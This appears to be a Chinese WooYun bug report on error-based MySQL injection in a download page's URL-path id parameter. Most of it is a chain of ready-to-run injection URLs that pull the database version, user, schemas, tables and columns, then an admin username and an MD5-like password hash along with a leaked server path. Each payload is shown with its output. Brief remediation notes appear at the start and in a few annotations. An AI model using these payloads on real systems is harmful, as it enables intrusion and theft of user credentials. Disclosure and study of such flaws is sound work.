http://www.wooyun.org/bugs/wooyun-2010-016667

之前想找个测试，没想到这有，可以测试下，做个记录而已。从下面的请求看，问题出在 URL 路径里的 id 值未经处理就拼进了 SQL，而且数据库的报错信息看起来会回显到页面上；修复应当对 id 做整型校验并改用参数化查询，同时关闭面向用户的数据库错误回显。
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php（推测是报错页面回显出的脚本绝对路径，属于额外的路径泄露）

或者

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21（回显值末尾的 1 应是 concat 里 floor(rand(0)*2) 拼上去的后缀，实际 group_id 为 1、2）
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361（同理，去掉末尾的 1 后，实际 user_id 应为 1、34、35、36）
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd（32 位十六进制串，形似未加盐的 MD5；若确是如此，口令存储也应改为加盐的慢哈希，并在修复注入后重置该账号口令）